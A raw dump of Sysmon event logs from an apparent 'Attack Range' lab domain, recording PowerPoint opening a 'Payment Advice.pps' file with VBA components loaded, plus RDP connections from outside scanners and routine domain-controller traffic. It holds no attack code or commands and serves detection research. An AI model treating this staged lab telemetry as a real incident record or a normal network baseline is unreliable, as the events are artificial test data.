Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081825Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-7605-00000000BB01}4400C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdce3|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdc83|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdbf6|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bd59d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Program Files\Microsoft Office\root\Office16\ppcore.dll+2f4b95|C:\Program Files\Microsoft Office\root\Office16\ppcore.dll+8850|C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE+1c8d|C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE+1b66|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000081824Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\Payment Advice.pps.LNK2021-04-20 14:59:17.965 10341000x800000000000000081823Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-C0A6-607E-8105-00000000BB01}8366912C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\windows.storage.dll+3c6d1e|C:\Windows\System32\windows.storage.dll+3c8d0e|C:\Windows\System32\windows.storage.dll+13c3e3|C:\Windows\System32\windows.storage.dll+13bdd9|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081822Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-C0A6-607E-8105-00000000BB01}8366912C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\windows.storage.dll+3c9e7e|C:\Windows\System32\windows.storage.dll+3c5b4f|C:\Windows\System32\windows.storage.dll+3c6c90|C:\Windows\System32\windows.storage.dll+3c8d0e|C:\Windows\System32\windows.storage.dll+13c3e3|C:\Windows\System32\windows.storage.dll+13bdd9|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081821Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}54965472C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+3c73e8|C:\Windows\System32\windows.storage.dll+3cb9df|C:\Windows\System32\windows.storage.dll+3cbf38|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175394|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175279|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081820Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}54965472C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+3c73cc|C:\Windows\System32\windows.storage.dll+3cb9df|C:\Windows\System32\windows.storage.dll+3cbf38|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175394|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175279|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081819Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}54965472C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+3c73cc|C:\Windows\System32\windows.storage.dll+3cb9df|C:\Windows\System32\windows.storage.dll+3cbf38|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175394|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175279|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000081818Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.934{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL7.1.16.13127Microsoft Visual Basic for Applications componentMicrosoft Visual Basic for ApplicationsMicrosoft CorporationVBEUI.DLLMD5=F61ACCA99010E982D1E25BB1DCACCF30,SHA256=89B47B853D071F3862E57037180555D13264D3B521253EB985863065FC27EF68,IMPHASH=F167294CA50F7D378B96DB3328869523trueMicrosoft CorporationValid 23542300x800000000000000081817Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Temp\~$Payment Advice.ppsMD5=BF08584F3AEB59EF0EDA0F39C76CDEB7,SHA256=25728763F1B23C6337462291FE17A89AF10C166B253B3509F7B1887C1978462D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081816Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.606{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\~DF139FF2E41D489211.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000081815Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.606{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\~DF586A17A169894A5F.TMPMD5=7F26A9A90CC3E9CED881ACD918E6F3AB,SHA256=DA1A75506F3888B77E4C90334FF19CAC255ED55D6B1FDADB4B285536F8C57D34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081814Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.590{A7A01FEF-C0A6-607E-8105-00000000BB01}8364040C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000081813Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.622{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-339.attackrange.local57641-false10.0.1.14win-dc-339.attackrange.local3268msft-gc 354300x800000000000000081812Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.622{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57641-false10.0.1.14win-dc-339.attackrange.local3268msft-gc 354300x800000000000000081811Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.483{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-7262-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000081810Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.346{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-9983-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000081809Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.231{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6EF2B4F49D282C839A1508A98D6BA15C,SHA256=4EE048C6D02FDB55487888153C9BDB2FBF6904A161985D1413B8890AEB8DABCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081808Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:16.997{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECF27A916A1F40755E03AC8154FE34BA,SHA256=87BD43E69700305C6FD1FA656678532E1CBD38AEF4EB2D2C93E280666DDDE8E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050763Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:16.027{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-62750-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050762Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:17.366{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB06762290D8ABB021B678E2228DE487,SHA256=5D040CFF808EFCB8AFC1F9F33719A0F7DACF37A5017B787D14C317FB3E527F6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050761Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:17.053{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5D6B3E89EF7908A5725194BA1E5D8367,SHA256=50BE07CDC7A1471A70B74E5ADE4B0E1B65797B783B0D6217630C41FE229BB1EF,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000081849Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:59:18.715{A7A01FEF-B636-607E-2E00-00000000BB01}2196C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\BD98497A-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_BD98497A-0000-0000-0000-100000000000.XML 13241300x800000000000000081848Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:59:18.715{A7A01FEF-B636-607E-2E00-00000000BB01}2196C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\B04DA29D-EACF-4308-B648-227B5727B21E\Config SourceDWORD (0x00000001) 13241300x800000000000000081847Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:59:18.715{A7A01FEF-B636-607E-2E00-00000000BB01}2196C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\B04DA29D-EACF-4308-B648-227B5727B21E\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_B04DA29D-EACF-4308-B648-227B5727B21E.XML 23542300x800000000000000081846Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:18.387{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6686C19D9F8264CD25989815BD35B8AA,SHA256=0E208DE2883A4E8A1C8FA8E34A85CBE981EF307C6F83B978EE42EF299AF0BF3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081845Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:18.387{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A3DAC772875059714114E94473C76DF,SHA256=F7343BE8C04D132674D05B2BFF8D5480E83C0B95A3B5FB5D5302868E45AF2222,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050765Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:16.659{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52547-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000050764Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:18.381{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45F82881C1C39AA78F4C0D0D571FBA24,SHA256=F74A44BD21C60753F86BBA50465A46AF2100A13EBBF1AEF9F7233DB3D6F2F943,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081858Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:18.786{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57645-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local389ldap 354300x800000000000000081857Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:18.786{A7A01FEF-B636-607E-2E00-00000000BB01}2196C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57645-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local389ldap 354300x800000000000000081856Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:18.780{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57644-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local389ldap 354300x800000000000000081855Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:18.780{A7A01FEF-B636-607E-2E00-00000000BB01}2196C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57644-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local389ldap 354300x800000000000000081854Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:18.766{A7A01FEF-B626-607E-0D00-00000000BB01}1008C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57643-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local135epmap 354300x800000000000000081853Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:18.766{A7A01FEF-B636-607E-2E00-00000000BB01}2196C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57643-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local135epmap 23542300x800000000000000081852Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:19.762{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=331D7CC63715D96B9F85631CBB253BD0,SHA256=330CD222F8FB86F89B8675615F6CDD795E6CB1B9A592B07F852D97745E30D49B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081851Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:19.403{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAA13DD58A7BB22FF1BB0C777464A8CB,SHA256=B99E091A1020211411C9EC8C5F68C3D4D98D312ECB7AEE1BE89F46584B02EB21,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081850Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:18.265{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57642-false10.0.1.12-8000- 354300x800000000000000050767Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:17.605{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-64224-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050766Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:19.413{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C79C92EDB476190A024DA9D9A57FD7EA,SHA256=365B8A6BF9A167E97D5004C83EB97BE5EF962D55AB35CE2724DBAB413D1B107B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081861Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:20.528{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D89CEF54F84614E964C6EE35393409F1,SHA256=F171D21A2C0C577CDD54510804317E58A801C905C2D75AFF7F658125D4005227,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081860Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:19.159{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com58172-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000081859Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:19.127{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com59705-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000050769Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:20.663{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=181A3F31729F94F656589C6B4F61D319,SHA256=09EBF4998354BDE2204CC4BA4B0CB345B416251589C61313420A396144C5E319,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050768Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:20.413{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8515AB68B8B58568866285B4A221E4F1,SHA256=BDFBA9C967737AC89E8A8EC36CA2EE1DB9073B532A96EC57E126E1EB7499A259,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081864Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:19.872{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-11342-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000081863Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:21.606{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CC459E3AD4F93CEFAB44295EC4300A53,SHA256=2DB1AB886CD65393CE31FAC747BA367005A64780415CDF18A3AEE3D0298F6E39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081862Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:21.575{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF7EDE056370818B67A50D3DE88F519F,SHA256=B487396B2CF4ADDD3BE9575208D52895599E944D76051B4FD1CAB94ACCAEA83E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050770Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:21.444{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A82B3D5FA6D2E24A6DB70270C5403B9,SHA256=8EABE18CDB726BA1D1C6353B0057BCEDC534C12164D1768B9437957DF4A78567,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081867Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:21.446{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-12703-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000081866Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:21.185{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-15423-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 